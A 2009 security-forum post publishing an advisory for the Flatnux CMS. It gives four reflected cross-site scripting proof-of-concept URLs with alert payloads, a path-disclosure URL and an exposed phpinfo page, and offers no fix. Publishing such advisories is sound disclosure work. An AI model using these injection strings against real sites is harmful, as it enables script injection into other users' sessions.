InterN0T - Advisories Advisories that are found by members of InterN0T.

InterN0T Affiliates:
EvilZonepy1337

SirCapsAlot.NET

Reply
 
LinkBack (1) Thread Tools Display Modes
  1 links from elsewhere to this Post. Click to view. #1  
Old 4th June 2009, 00:37
MaXe's Avatar
The Founder
  
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 2,714
Blog Entries: 31
Rep Power: 10
Reputation: 146
MaXe will become a Token soonMaXe will become a Token soon
[InterN0T] Flatnux 2009-03-27 - XSS Vulnerabilities + More
Flatnux - Cross Site Scripting Vulnerabilities + More

Version Affected: "2009-03-27" (newest)

Info: See website for more information.

Credits: InterN0T

External Links:
http://www.flatnux.altervista.org/


-:: The Advisory ::-
Quote:
Vulnerable Function / ID Calls:
mod, user, from, pk & dir (some has to be used in conjunction with other function calls)

Cross Site Scripting:
1. http://www.website.tld/flatnux/index.php?mod="><script>alert(0)</script> (anyone)
2. http://www.website.tld/flatnux/index.php?mod=login&op=profile&user="><script>aler t(0)</script> (registered users only)
3. http://www.website.tld/flatnux/index.php?opindex=modcont&file=misc/motd.en.php&from="><script>alert(0)</script> (admin only)
4. http://www.website.tld/flatnux/controlcenter.php?mod=controlcenter&op=03_users/20_groups&opmod=insnew_groups&pk="><script>alert(0 )</script> (admin only)

Path Disclosure:
http://www.website.tld/flatnux/index.php?mod=05_Foto&dir='

Information Disclosure:
http://www.website.tld/flatnux/sections/none_Control_Center/phpinfo.php
-:: Solution ::-
I didn't bother to find one, sorry.

Disclosure Information:
- Vulnerabilities found and confirmed between 1st and 3rd June 2009.
- Published at InterN0T the 3rd June 2009.
- Bugtraq contacted the 3rd June 2009.


All of the best,
MaXe
__________________
Code:
                                ____/____\_________________
                      \|/      | OMG IT'S TEH LEET STORY!! |
    /*\         /\    -*-      |______  ________/\_________|
   // \\       /  \   /|\        /    \/    \  /  \
  /// \\\     /    \            /            \/    \
   // \\     /      \          /      \o/     \     \
    | |     /        \        /        |       \     \
 ___| |____/          \______/________/ \_______\_____\_________
          /     o      \
               #"=-
               /\
 __________________________________________________________
    On a mission, to find the lost member of Teh Unkwon..
Reply With Quote
Reply

Bookmarks

« [InterN0T] Geeklog 1.5 - Pre-Installation Vulnerabilities | [InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On

LinkBacks (?)
LinkBack to this Thread: http://forum.intern0t.net/intern0t-advisories/1084-intern0t-flatnux-2009-03-27-cross-site-scripting-vulnerabilities-more.html
Posted By For Type Date
FlatnuX CMS Multiple Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com This thread Refback 10th June 2009 16:18

Similar Threads
Thread Thread Starter Forum Replies Last Post
[InterN0T] AMember 3.1.7 - Multiple Vulnerabilities MaXe InterN0T - Advisories 11 27th September 2009 19:09
[InterN0T] transLucid 1.75 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 22:02
[InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 21:47
[InterN0T] Geeklog 1.5 - Pre-Installation Vulnerabilities MaXe InterN0T - Advisories 0 4th June 2009 00:36
[News] InterN0T 2009 - February MaXe InterN0T Newz 0 13th February 2009 15:39


All times are GMT +2. The time now is 09:58.
Copyright ©2007 - Forever, InterN0T & Teh Unkwon

Hosted by 1and1


Contact Us - InterN0T - Archive - Top
Powered by vBulletin® Version 1.3.37
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.